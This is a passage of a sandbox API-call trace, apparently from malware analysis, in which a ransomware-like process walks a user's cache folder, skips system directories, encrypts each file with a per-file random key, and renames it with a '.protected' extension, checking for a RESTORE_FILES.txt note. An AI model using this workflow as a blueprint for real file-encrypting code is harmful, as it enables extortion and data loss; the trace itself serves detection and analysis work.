pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected") returned 162 [0089.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.protected")) returned 1 [0089.023] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Windows") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files (x86)") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="$Recycle.bin") returned 1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="System Volume Information") returned -1 [0089.023] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.023] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".protected") returned 0x0 [0089.023] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="RESTORE_FILES.txt") returned -1 [0089.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0089.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".rar") returned 0x0 [0089.024] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".zip") returned 0x0 [0089.024] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.025] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.025] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.025] CloseHandle (hObject=0x150) returned 1 [0089.026] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected") returned 162 [0089.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.protected")) returned 1 [0089.026] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Windows") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files (x86)") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="$Recycle.bin") returned 1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="System Volume Information") returned -1 [0089.026] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.026] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".protected") returned 0x0 [0089.027] lstrcmpW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="RESTORE_FILES.txt") returned -1 [0089.027] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.027] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".rar") returned 0x0 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".zip") returned 0x0 [0089.028] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.029] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.029] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.029] CloseHandle (hObject=0x150) returned 1 [0089.029] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected") returned 162 [0089.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.protected")) returned 1 [0089.030] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Windows") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files (x86)") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="$Recycle.bin") returned 1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="System Volume Information") returned -1 [0089.030] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.030] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".protected") returned 0x0 [0089.030] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="RESTORE_FILES.txt") returned -1 [0089.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0089.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".rar") returned 0x0 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".zip") returned 0x0 [0089.031] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.032] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.032] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.032] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.032] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.032] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.032] CloseHandle (hObject=0x150) returned 1 [0089.033] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected") returned 162 [0089.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.protected")) returned 1 [0089.033] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Windows") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files (x86)") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="$Recycle.bin") returned 1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="System Volume Information") returned -1 [0089.033] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".protected") returned 0x0 [0089.034] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="RESTORE_FILES.txt") returned -1 [0089.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".rar") returned 0x0 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".zip") returned 0x0 [0089.034] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.035] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.035] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.035] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.035] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.035] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.036] CloseHandle (hObject=0x150) returned 1 [0089.036] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected") returned 162 [0089.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.protected")) returned 1 [0089.037] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Windows") returned -1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files") returned -1 [0089.037] lstrcmpiW 
